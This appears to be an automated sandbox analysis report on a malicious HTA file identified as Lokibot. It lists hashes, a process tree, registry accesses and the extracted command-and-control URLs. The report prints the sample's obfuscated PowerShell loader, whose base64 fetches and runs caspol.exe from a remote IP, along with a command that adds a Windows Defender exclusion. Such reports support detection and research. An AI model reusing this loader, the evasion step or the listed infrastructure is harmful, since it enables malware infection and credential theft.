Analysis
-
max time kernel
278s -
max time network
279s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
19-11-2024 09:43
Static task
static1
Behavioral task
behavioral1
Sample
19112024_0943_seemefasterthanbeforewithhisbestthingsinonlineforgetreadyfor.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
19112024_0943_seemefasterthanbeforewithhisbestthingsinonlineforgetreadyfor.hta
Resource
win10v2004-20241007-en
General
-
Target
19112024_0943_seemefasterthanbeforewithhisbestthingsinonlineforgetreadyfor.hta
-
Size
178KB
-
MD5
a54bdd270a424ec79b735ef6b513c2e4
-
SHA1
465738a3e31b16ad80c44f3dc7bdd762e402cb51
-
SHA256
dbcbb51e8c114fa8a7b9a1da2bbba100994eea4ed407bc338dedec5f811ade21
-
SHA512
598f303f9f570851f3e538dcd5d9e23717e177b3e652320a7d58dc4800a0f81d9445b719e51b0875b640460c1b4d6be7a592e738b1004c2c0490bffac8ba0c61
-
SSDEEP
96:4vCl1722AAZtbZfjdDINnmScJXD65zbfKZ/UQ:4vCld22AAVjBIcyzbfyUQ
Malware Config
Extracted
lokibot
http://94.156.177.41/maxzi/five/fre.php
http://kbfvzoboss.bid/alien/fre.php
http://alphastand.trade/alien/fre.php
http://alphastand.win/alien/fre.php
http://alphastand.top/alien/fre.php
Signatures
-
Lokibot family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 4 552 pOWERSHELl.exE -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1628 powershell.exe -
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 2 IoCs
pid Process 552 pOWERSHELl.exE 2760 powershell.exe -
Executes dropped EXE 2 IoCs
pid Process 1504 caspol.exe 2424 caspol.exe -
Loads dropped DLL 3 IoCs
pid Process 552 pOWERSHELl.exE 552 pOWERSHELl.exE 552 pOWERSHELl.exE -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook caspol.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook caspol.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook caspol.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1504 set thread context of 2424 1504 caspol.exe 39 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language caspol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pOWERSHELl.exE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 552 pOWERSHELl.exE 2760 powershell.exe 1628 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 552 pOWERSHELl.exE Token: SeDebugPrivilege 2760 powershell.exe Token: SeDebugPrivilege 1628 powershell.exe Token: SeDebugPrivilege 2424 caspol.exe -
Suspicious use of WriteProcessMemory 34 IoCs
description pid Process procid_target PID 2956 wrote to memory of 552 2956 mshta.exe 31 PID 2956 wrote to memory of 552 2956 mshta.exe 31 PID 2956 wrote to memory of 552 2956 mshta.exe 31 PID 2956 wrote to memory of 552 2956 mshta.exe 31 PID 552 wrote to memory of 2760 552 pOWERSHELl.exE 33 PID 552 wrote to memory of 2760 552 pOWERSHELl.exE 33 PID 552 wrote to memory of 2760 552 pOWERSHELl.exE 33 PID 552 wrote to memory of 2760 552 pOWERSHELl.exE 33 PID 552 wrote to memory of 1100 552 pOWERSHELl.exE 34 PID 552 wrote to memory of 1100 552 pOWERSHELl.exE 34 PID 552 wrote to memory of 1100 552 pOWERSHELl.exE 34 PID 552 wrote to memory of 1100 552 pOWERSHELl.exE 34 PID 1100 wrote to memory of 2892 1100 csc.exe 35 PID 1100 wrote to memory of 2892 1100 csc.exe 35 PID 1100 wrote to memory of 2892 1100 csc.exe 35 PID 1100 wrote to memory of 2892 1100 csc.exe 35 PID 552 wrote to memory of 1504 552 pOWERSHELl.exE 37 PID 552 wrote to memory of 1504 552 pOWERSHELl.exE 37 PID 552 wrote to memory of 1504 552 pOWERSHELl.exE 37 PID 552 wrote to memory of 1504 552 pOWERSHELl.exE 37 PID 1504 wrote to memory of 1628 1504 caspol.exe 38 PID 1504 wrote to memory of 1628 1504 caspol.exe 38 PID 1504 wrote to memory of 1628 1504 caspol.exe 38 PID 1504 wrote to memory of 1628 1504 caspol.exe 38 PID 1504 wrote to memory of 2424 1504 caspol.exe 39 PID 1504 wrote to memory of 2424 1504 caspol.exe 39 PID 1504 wrote to memory of 2424 1504 caspol.exe 39 PID 1504 wrote to memory of 2424 1504 caspol.exe 39 PID 1504 wrote to memory of 2424 1504 caspol.exe 39 PID 1504 wrote to memory of 2424 1504 caspol.exe 39 PID 1504 wrote to memory of 2424 1504 caspol.exe 39 PID 1504 wrote to memory of 2424 1504 caspol.exe 39 PID 1504 wrote to memory of 2424 1504 caspol.exe 39 PID 1504 wrote to memory of 2424 1504 caspol.exe 39 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook caspol.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook caspol.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\19112024_0943_seemefasterthanbeforewithhisbestthingsinonlineforgetreadyfor.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2956 -
C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE"C:\Windows\SysTEM32\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE" "PowERShell.EXE -EX BYpaSS -nOP -W 1 -c DevIcEcREDeNTiALDePLoYmENT ; iNvOkE-EXprEssion($(invOkE-exPreSSIoN('[sYsteM.tEXT.EncOdInG]'+[CHar]0X3A+[CHaR]0x3A+'Utf8.GEtsTriNG([sYSTEm.CONvErT]'+[ChAr]0x3a+[CHar]58+'fROMbasE64string('+[char]34+'JEFIQ2MxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJlUkRlRmlOaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHEsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3piR3Ysc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZEdvU2hpRWwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZZTGlNem4sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYkcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJNQmdOa1F0IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBLWHhFWHhxZEVFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSENjMTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzY2LjYzLjE4Ny4yMzEvNjU3L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtTVGFSVC1zbGVFcCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXGNhc3BvbC5leGUi'+[ChAR]34+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:552 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BYpaSS -nOP -W 1 -c DevIcEcREDeNTiALDePLoYmENT3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2760
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\091fxpq0.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1100 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD605.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCD604.tmp"4⤵
- System Location Discovery: System Language Discovery
PID:2892
-
-
-
C:\Users\Admin\AppData\Roaming\caspol.exe"C:\Users\Admin\AppData\Roaming\caspol.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1504 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\caspol.exe"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1628
-
-
C:\Users\Admin\AppData\Roaming\caspol.exe"C:\Users\Admin\AppData\Roaming\caspol.exe"4⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:2424
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD57362a261e1329c8580c1480db7e14bbf
SHA1f9f07e4573a73d2b7e7fd5c874459ea9f10b51a0
SHA256c5fe377332d220dd2df51920fc609fda1db3534d39f8f1bf8ab5d6e83a938060
SHA5127420fd07d667b28ea9da0f23307438a48adff801a74b1b51676095bc8a1ded9e09a43a2dd3d03f98977ade9de9a109ce77c9eacaabcba0465aea6f2338d7a37f
-
Filesize
7KB
MD5789ee44e89cfe792e5724fd06d322a6b
SHA12c466881760bb316ff82d51fc3b2cdcf51db4d69
SHA2568e2a9d70d843e01ed46f6e408d82d26d7c96099d7b424e44e55009b8eae3e138
SHA5126e400c7311a6ab10e3bbfa80a7bac1e46fec471e81d101b0ddbb64cb4377878385721218fdc7baed02ec1741d7737660bd6333530fcaff95da182d8106ca1d18
-
Filesize
1KB
MD5df2dcae5583d0c218fd1ad2e0ca0e47a
SHA13764699e3418d529dc1f4a6811aef0691639a619
SHA2562fde34bc92d401379fb095b9283a2faadd13b7121f705f859a66ac9b08833914
SHA512f4d0c5007b653420079819950bf6d8e204c4b7d7660eea612868fcec5c00556b9e2bdf0a328c6487d01f05696b5b281f0ccc22dadad00973afa0190993795040
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-4177215427-74451935-3209572229-1000\0f5007522459c86e95ffcc62f32308f1_bf99bef1-312f-4726-8597-70228ef05e99
Filesize46B
MD5d898504a722bff1524134c6ab6a5eaa5
SHA1e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA51226a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-4177215427-74451935-3209572229-1000\0f5007522459c86e95ffcc62f32308f1_bf99bef1-312f-4726-8597-70228ef05e99
Filesize46B
MD5c07225d4e7d01d31042965f048728a0a
SHA169d70b340fd9f44c89adb9a2278df84faa9906b7
SHA2568c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA51223d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD503e88e8e1bdafd6d1fefcaea0325f163
SHA1541e0d77b7f487db05528f30909c65367b0a4096
SHA256b1b9aa2949a3068adf9f2b5af34d027e4d050d3e318375fc3a9d1410ee4fb75e
SHA51291390c793ccdb6535da844d3e706fd09240c657d6b05f6378df2b71aa50562658d5b01b3a3f7dfe9813ed18821658e6db5b590a47b4190a9ee600358562417db
-
Filesize
477B
MD5f97fc8141f59078b4354b513d3b083ac
SHA1293904ab8d5f38a2f0764ee2e35e97e590d8c737
SHA256f6766cc467b91c9c99186a91d4cc32ebf6803b04c9e82ba8dedd54f9dc25b32e
SHA51287b65e67e76c334c79481d25513fb1696ab86b1d8bf6006b7436a5ba7e522e2101912315c16d92cb0bf0feb86aa9616d5ea1019054c489958ca364947abe879c
-
Filesize
309B
MD520dea8387fc331626278d693ec4d7afe
SHA189cd5b7de7ece9bfb2d957ecbb8f9661f04097bd
SHA2568e14e4dcdaa6c0748932d4184b9560c7a5d99e9d09dfece00e84bd3cd632cefe
SHA512a04e1f3b612803954dcb8f29366b0b11bcd91b66c6a1cc6916f7d1c864d48bed7bfc2004cb58c10dd591dd745b03314127591f9a055f4ee05a93fdad0b0c81c8
-
Filesize
652B
MD5334187c4447ea5e06009c6bf52095b4e
SHA1a50e9d5f35649531be2ec09e794e469bd6e48397
SHA25682531887a9d167382108eec480954589710a333dcbc5cd59a3999842eec97878
SHA512fa633199ea10ad3dd8b3cc4d714d7e8dcdd9b8cca68746697db499dd600ef5d9a1ef1ea5d295fa465946b40ef2d9e2becf19a1b4eb9908e7b40c681714213f03
-
Filesize
506KB
MD5759dd13715bc424308f1d0032ac4b502
SHA103347c96c50c140192e8df70260d732bea301ebc
SHA256d4c86776bcf1dc4ffd2f51538f3e342216314b76cdba2c2864193350654a9aca
SHA5124197992f4b44ea45c91cb00c7308949560ae24d179e9a14ebc4efb27e1b20abae203b1c8756c211eb9aab9732a3fd04c824bd6bc92510c8de3caea3a8cfa8e55